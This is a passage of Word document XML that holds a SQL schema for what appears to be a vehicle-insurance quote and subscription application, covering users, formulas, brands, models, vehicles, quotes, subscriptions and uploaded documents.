          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE user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email       VARCHAR(180)       NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    roles       JSON               NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    password    VARCHAR(255)       NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    fname       VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    lname       VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    UNIQUE INDEX UNIQ_IDENTIFIER_EMAIL (email),</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formula ────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE formula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name        VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    base_price  INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    description LONGTEXT           DEFAULT NULL,</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brand ──────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE brand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name VARCHAR(255)       NOT NULL,</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model ──────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE model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name           VARCHAR(255)       NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    purchase_price INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    brand_id       INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    INDEX IDX_model_brand (brand_id),</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xml:space="preserve">    CONSTRAINT FK_model_brand FOREIGN KEY (brand_id) REFERENCES brand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vehicle_reference ──────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE vehicle_reference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year     SMALLINT           NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    model_id INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    INDEX IDX_vref_model (model_id),</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xml:space="preserve">    CONSTRAINT FK_vref_model FOREIGN KEY (model_id) REFERENCES model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vehicle ────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE vehicle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type          VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    brand         VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    model         VARCHAR(40)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    license_plate VARCHAR(20)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    vehicle_year  SMALLINT           NOT NULL,</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quote ──────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE quote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duration        SMALLINT           NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    created_at      DATETIME           NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    expired_at      DATETIME           NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    status          VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    license_year    SMALLINT           NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    birth_date      DATE               NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    estimated_price DOUBLE PRECISION   NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    bonus_malus     NUMERIC(5, 2)      NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    user_id         INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    formula_id      INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    vehicle_id      INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    INDEX IDX_quote_user    (user_id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    INDEX IDX_quote_formula (formula_id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    INDEX IDX_quote_vehicle (vehicle_id),</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xml:space="preserve">    CONSTRAINT FK_quote_user    FOREIGN KEY (user_id)    REFERENCES user (id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    CONSTRAINT FK_quote_formula FOREIGN KEY (formula_id) REFERENCES formula (id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    CONSTRAINT FK_quote_vehicle FOREIGN KEY (vehicle_id) REFERENCES vehicle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subscription ───────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE subscription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reference_number VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    status           VARCHAR(150)       NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    submitted_at     DATETIME           NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    processed_at     DATETIME           DEFAULT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    quote_id         INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    user_id          INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    UNIQUE INDEX UNIQ_sub_quote (quote_id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    INDEX IDX_sub_user (user_id),</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xml:space="preserve">    CONSTRAINT FK_sub_quote FOREIGN KEY (quote_id) REFERENCES quote (id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    CONSTRAINT FK_sub_user  FOREIGN KEY (user_id)  REFERENCES user (id)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) DEFAULT CHARACTER SET utf8mb4;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-- ── TABLE document ───────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE document (</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    id              INT AUTO_INCREMENT NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    type            VARCHAR(50)        NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    name            VARCHAR(200)       NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    uploaded_at     DATETIME           NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    subscription_id INT                NOT NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    INDEX IDX_doc_subscription (subscription_id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    PRIMARY KEY (id),</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    CONSTRAINT FK_doc_sub FOREIGN KEY (subscription_id) REFERENCES subscription (id)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D2D7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) DEFAULT CHARACTER SET utf8mb4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75825523" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRPr="005D2D7E" w:rsidRDefault="00F868DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24091C53" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="005D2D7E" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc233817811"/>
